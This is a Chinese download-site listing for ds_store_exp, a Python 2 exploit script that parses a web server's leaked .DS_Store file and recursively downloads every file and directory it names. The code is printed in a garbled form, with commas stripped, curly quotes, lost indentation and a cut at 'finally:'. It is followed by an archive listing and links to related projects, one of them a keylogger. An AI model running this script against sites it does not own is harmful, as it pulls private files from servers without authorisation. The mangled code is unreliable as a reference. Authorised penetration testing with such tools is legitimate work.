资源简介
这是一个.DS_Store文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地。
代码片段和文件信息
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# LiJieJie my[at]lijiejie.com http://www.lijiejie.com
import sys
import urllib2
import cStringIO
import urlparse
import os
import Queue
import ssl
import threading
from ds_store import DSStore
context = ssl._create_unverified_context()
class Scanner(object):
def __init__(self start_url):
self.queue = Queue.Queue()
self.queue.put(start_url)
self.processed_url = set()
self.lock = threading.Lock()
self.working_thread = 0
def process(self):
while True:
try:
url = self.queue.get(timeout=2.0)
self.lock.acquire()
self.working_thread += 1
self.lock.release()
except Exception as e:
if self.working_thread == 0:
break
else:
continue
try:
if url in self.processed_url:
pass
else:
self.processed_url.add(url)
base_url = url.rstrip(‘.DS_Store‘)
if not url.lower().startswith(‘http‘):
url = ‘http://%s‘ % url
schema netloc path _ _ _ = urlparse.urlparse(url ‘http‘)
try:
response = urllib2.urlopen(url context=context)
except Exception e:
if e.code != 404:
self.lock.acquire()
print ‘[%s] %s‘ % (e.code url)
self.lock.release()
continue
data = response.read()
if response.code == 200:
folder_name = netloc.replace(‘:‘ ‘_‘) + ‘/‘.join(path.split(‘/‘)[:-1])
if not os.path.exists(folder_name):
os.makedirs(folder_name)
with open(netloc.replace(‘:‘ ‘_‘) + path ‘wb‘) as outFile:
self.lock.acquire()
print ‘[%s] %s‘ % (response.code url)
self.lock.release()
outFile.write(data)
if url.endswith(‘.DS_Store‘):
ds_store_file = cStringIO.StringIO()
ds_store_file.write(data)
d = DSStore.open(ds_store_file)
dirs_files = set()
for x in d._traverse(None):
dirs_files.add(x.filename)
for name in dirs_files:
if name != ‘.‘:
self.queue.put(base_url + name)
self.queue.put(base_url + name + ‘/.DS_Store‘)
d.close()
except Exception as e:
self.lock.acquire()
print ‘[!] %s‘ % str(e)
self.lock.release()
finally:
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2019-05-06 03:20 ds_store_exp-master\
文件 17 2019-05-06 03:20 ds_store_exp-master\.gitignore
文件 3793 2019-05-06 03:20 ds_store_exp-master\README.md
文件 3552 2019-05-06 03:20 ds_store_exp-master\ds_store_exp.py
文件 16 2019-05-06 03:20 ds_store_exp-master\requirements.txt
相关资源
- Python-中国科学院大学教务抢课程序多
- Python-BilibiliLiveBarrage实时监控B站直播
- Python-用pyqt5和parametrics实现很酷的动画
- Python-在线网络小说搜索阅读网站
- Python-Camelot一个可以轻松地从PDF文件中
- Python-一个用手势控制的计算器
- Python-最全中华古诗词数据库
- Python-导出qq音乐歌单的小工具导出格
- Python-利用keras模仿汪峰生成歌词
- Python-洛谷冬日绘板脚本
- Python-PermaNote是基于Sandstorm开源的个人
- Python-当朋友给你发iMessage时自动回复
- Python-中国县级行政区划的边界数据并
- Python-垃圾分类助手猜测可能是什么垃
- Python-csv2tex将csv数据变成LaTeX表格
- Python-基于itchat库和图灵机器人实现的
- Python-农业知识图谱农业领域的命名实
- Python-从Python高效处理FASTQ文件
- Python-一个WindowsLinux和Mac的简单键盘记
- Python-Binance虚拟货币交易机器人
- Python-AWDHunter一个基于Python27的AWD自动
- Python-ArkNights自动作战脚本
- Python-导出安卓微信聊天数据工具
- Python-这是一个简单的Web聊天系统可以
川公网安备 51152502000135号
评论
共有 条评论